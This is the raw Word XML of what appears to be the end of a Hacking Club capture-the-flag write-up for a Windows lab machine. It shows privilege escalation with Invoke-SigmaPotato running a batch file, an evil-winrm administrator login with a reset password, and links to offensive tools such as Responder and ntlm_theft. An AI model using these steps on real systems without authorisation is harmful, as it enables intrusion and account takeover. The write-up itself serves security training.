      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for execution with elevated privileges.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000163">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64">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both"/>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Invoke-SigmaPotato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C:\Users\TEMP.JARVIS\Documents\password.bat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000165">
      <w:pPr>
        <w:spacing w:after="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6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133600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="82" name="image21.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image21.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2133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7">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000168">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69">
      <w:pPr>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16A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>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changing the password, a new WinRM connection was established using the updated credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016B">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">evil-winrm.rb</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-u</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administrator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-p</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'NovaSenha123!'</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37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;machine-ip&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016C">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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244600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="90" name="image20.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image20.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1244600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="254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after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The final flag was obtained at: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Users\Administrator\Desktop</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000170">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId44" w:type="default"/>
      <w:headerReference r:id="rId45" w:type="first"/>
      <w:headerReference r:id="rId46" w:type="even"/>
      <w:footerReference r:id="rId47" w:type="default"/>
      <w:footerReference r:id="rId48" w:type="first"/>
      <w:footerReference r:id="rId49" w:type="even"/>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="0" w:left="1440" w:right="1440" w:header="0" w:footer="85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widowControl w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">© 2025 Hacking Club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8">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1">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172">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.eqcnr7mz12v" w:id="8"/>
    <w:bookmarkEnd w:id="8"/>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-866770</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>95250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="719138" cy="232221"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="71" name="image1.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image1.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173">
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:pBdr>
        <w:top w:space="0" w:sz="0" w:val="nil"/>
        <w:left w:space="0" w:sz="0" w:val="nil"/>
        <w:bottom w:space="0" w:sz="0" w:val="nil"/>
        <w:right w:space="0" w:sz="0" w:val="nil"/>
        <w:between w:space="0" w:sz="0" w:val="nil"/>
      </w:pBdr>
      <w:spacing w:after="120" w:before="360" w:lineRule="auto"/>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174">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark2"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11.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-942970</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="77" name="image9.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image9.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15679"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="70"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Jarvis</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-344480</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5771833</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6686550" cy="3015679"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="70" name="image35.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image35.png"/>
                      <pic:cNvPicPr preferRelativeResize="0"/>
                    </pic:nvPicPr>
                    <pic:blipFill>
                      <a:blip r:embed="rId2"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </pic:blipFill>
                    <pic:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6686550" cy="3015679"/>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1"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1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42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId45"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48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="foot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pp.hackingclub.com/laboratory/competition-machines/292#"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32.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/tylerdotrar/SigmaPotato/blob/main/Invoke-SigmaPotato.ps1" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netexec.wiki/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Greenwolf/ntlm_theft" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SpiderLabs/Responder" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.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1.png"/></Relationships>
</file>

<file path=word/_rels/header2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.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w1fk5khsq44gVdmS8oVqhDBYGw==">CgMxLjAyDmguMzZnaDJzbzRkcnZqMg5oLm44bHF1MWlmNGgwczIOaC56Z3o1NzBnMnk4YTIyDmguaHczZXplaXZtOXB1Mg5oLmt6dXBmdWcyZjYwajIOaC5tYXJ0d2Q4Zm4wazcyDmguNG14ZHB0aG9oMzFlMg5oLndjbHlzbmh2djR2NTINaC5lcWNucjdtejEydjgAciExY3VrWFBWOHA5bTA4QlZ1ekl6azVtOGdyM05WWDAyOHA=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